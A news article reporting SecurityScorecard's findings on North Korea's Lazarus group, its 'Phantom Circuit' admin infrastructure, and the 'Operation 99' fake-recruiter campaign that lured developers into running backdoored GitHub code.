Photo credit: www.darkreading.com
An ongoing investigation into the activities of North Korea’s Lazarus group, a notorious cyber threat actor, has unveiled a sophisticated administrative layer used to manage its global campaign targeting cryptocurrency entities and software developers. This research conducted by SecurityScorecard reveals how Lazarus employs this new infrastructure to effectively oversee compromised systems, control the delivery of malicious payloads, and manage the collection of exfiltrated data.
SecurityScorecard’s findings indicate that the Lazarus group is utilizing a web-based administrative platform that extends to various operations, including recent attempts to impersonate IT professionals. This highlights a concerning interconnectivity in their tactics, allowing them greater control over various facets of their cyber campaigns.
Enhanced Operational Security
Despite the elaborate security measures adopted by Lazarus to obscure their activities, SecurityScorecard asserts a strong connection between these operations and the North Korean state. Their analysis indicated that Lazarus was executing a coordinated attack on the cryptocurrency sector worldwide.
“The evidence shows that Lazarus has been conducting a worldwide campaign aimed at the cryptocurrency market and associated developers,” noted SecurityScorecard in a recent report. “This initiative led to numerous victims inadvertently executing the malicious payloads while data was silently extracted back to North Korea.”
During their probing of the Lazarus group’s activities, termed “Phantom Circuit” by SecurityScorecard, researchers were investigating an earlier operation called “Operation 99.” This campaign involved the group engaging with software developers under the guise of recruiting for fictitious projects, luring them into executing deceptive project tests and code reviews.
Victims who succumb to these scams are manipulated into cloning a seemingly innocuous open-source repository hosted on GitHub. This cloned resource is a direct pathway to the Lazarus group’s command-and-control (C2) infrastructure, facilitating the introduction of malware aimed at data theft. The group has been embedding obfuscated backdoors in legitimate applications, including widely used authentication and cryptocurrency software, to infiltrate developers’ environments. SecurityScorecard estimates that over 230 victims have unwittingly installed these malicious payloads as a result of this campaign.
Twofold Objectives
The motivations behind Lazarus’s operations appear to be twofold: facilitating cryptocurrency theft and breaching corporate networks. According to Ryan Sherstobitoff, senior vice president of threat intelligence at SecurityScorecard, developers who are fooled into executing the cloned code often do so on their corporate devices, inadvertently exposing sensitive development information.
The uncovering of the Phantom Circuit admin layer occurred during an effort to decipher how Lazarus was managing the stolen information from Operation 99. SecurityScorecard reported that the group took advantage of a complex array of Astrill VPNs and proxies to access the C2 infrastructure, demonstrating an advanced level of obfuscation in their operations. Astrill is known for providing anonymity in web browsing and bypassing heavy internet censorship.
Researchers tracked Lazarus members using Astrill VPNs that connected through a proxy network set up under a freight company registered in Hasan, Russia, ultimately creating a convoluted trail to hide their true origins. The C2 servers were found to be hosted on an infrastructure linked to a seemingly fictitious entity, “Stark Industries, LLC.”
SecurityScorecard concluded that the IP addresses associated with the C2 connections were likely proxies aimed at concealing the actual starting point of the operations. “The group established a secondary connection after their initial VPN link, thus veiling their true location,” the report stated. Their investigation identified six distinct IP addresses in Pyongyang instrumental in initiating the VPN links to the C2 network associated with Operation 99.
“Phantom Circuit is the underlying operational network that connects back to Pyongyang,” added Sherstobitoff. He further emphasized that this network was also used in another campaign where the Lazarus group impersonated IT professionals to infiltrate targeted organizations effectively.
Source
www.darkreading.com